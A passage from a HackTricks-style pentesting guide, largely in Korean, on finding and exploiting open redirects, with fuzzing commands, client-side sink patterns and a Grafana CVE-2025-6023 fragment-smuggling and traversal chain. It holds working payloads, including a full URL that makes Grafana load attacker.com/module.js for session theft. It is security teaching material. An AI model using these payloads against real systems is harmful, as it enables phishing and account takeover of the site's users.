2) Grep common parameters and normalize list

rg -NI “(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)” urls.txt
| sed ‘s/\r$//’ | sort -u > candidates.txt

3) Use OpenRedireX to fuzz with payload corpus

cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt

4) Manually verify interesting hits

awk ‘/30[1237]|Location:/I’ results.txt

</details>

- Don’t forget client-side sinks in SPAs: window.location/assign/replace와 query/hash를 읽어 리디렉션하는 프레임워크 헬퍼를 찾아보세요.

- 프레임워크는 리디렉션 목적지가 신뢰할 수 없는 입력(query params, Referer, cookies)에서 유도될 때 종종 취약점을 유발합니다. Next.js의 리디렉션 관련 주의사항을 확인하고 사용자 입력에서 유도된 동적 목적지는 피하세요.

<a class="content_ref" href="../network-services-pentesting/pentesting-web/nextjs.md"><span class="content_ref_label">NextJS</span></a>

- OAuth/OIDC flows: open redirectors를 악용하면 authorization codes/tokens를 leaking하여 account takeover로 자주 이어집니다. 전용 가이드를 참조하세요:

<a class="content_ref" href="./oauth-to-account-takeover.md"><span class="content_ref_label">OAuth to Account takeover</span></a>

- Location 없이 리디렉션을 구현하는 서버 응답(meta refresh/JavaScript)은 여전히 phishing에 악용될 수 있으며 때로는 연쇄적으로 이어질 수 있습니다. Grep for:
```html
<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>

Fragment smuggling + client-side traversal chain (Grafana-style bypass)

• Server-side gap (Go url.Parse + raw redirect): validators가 URL.Path만 검사하고 URL.Fragment를 무시하면 외부 호스트를 # 뒤에 놓아 속일 수 있습니다. 핸들러가 나중에 unsanitized 문자열로 Location을 빌드하면, fragments가 리다이렉트 대상에 leak됩니다. /user/auth-tokens/rotate에 대한 예:
• Request: GET /user/auth-tokens/rotate?redirectTo=/%23/..//\//attacker.com HTTP/1.1
• Parsing sees Path=/ and Fragment=/..//\//attacker.com, so regex + path.Clean() approve /, but the response emits Location: /\//attacker.com, acting as an open redirect.
• Client-side gap (validate decoded/cleaned, return original): SPA helpers가 경로를 완전히 디코딩(중복 인코딩된 ? 포함)하고 검증을 위해 쿼리를 제거한 뒤 원본 문자열을 반환하면 인코딩된 ../가 살아남습니다. 브라우저가 나중에 디코딩하면 동일 출처의 아무 엔드포인트(예: redirect gadget)로 traversal이 발생합니다. 페이로드 패턴:
• /dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser/auth-tokens/rotate
• The validator checks /dashboard/script/ (no ..), returns the encoded string, and the browser walks to /user/auth-tokens/rotate.
• End-to-end XSS/ATO: traversal을 fragment-smuggled redirect와 체인으로 연결해 dashboard script loader가 attacker JS를 fetching하도록 강제합니다:

https://<grafana>/dashboard/script/%253f%2f..%2f..%2f..%2f..%2f..%2fuser%2fauth-tokens%2frotate%3fredirectTo%3d%2f%2523%2f..%2f%2f%5c%2fattacker.com%2fmodule.js

• path traversal가 rotate endpoint에 도달하면, 프래그먼트에 은닉된 redirectTo로부터 attacker.com/module.js로 302를 발행합니다. 공격자 origin이 허용적인 CORS로 JS를 제공하면 브라우저가 이를 실행하여 session theft/account takeover가 발생합니다.

도구

• https://github.com/0xNanda/Oralyzer
• OpenRedireX – open redirects를 탐지하기 위한 fuzzer. 예:

# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50

참고자료

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect 에서 fuzzing lists를 찾을 수 있습니다.
• https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html
• https://github.com/cujanovic/Open-Redirect-Payloads
• https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a
• PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
• OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
• Grafana CVE-2025-6023 redirect + traversal bypass chain

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.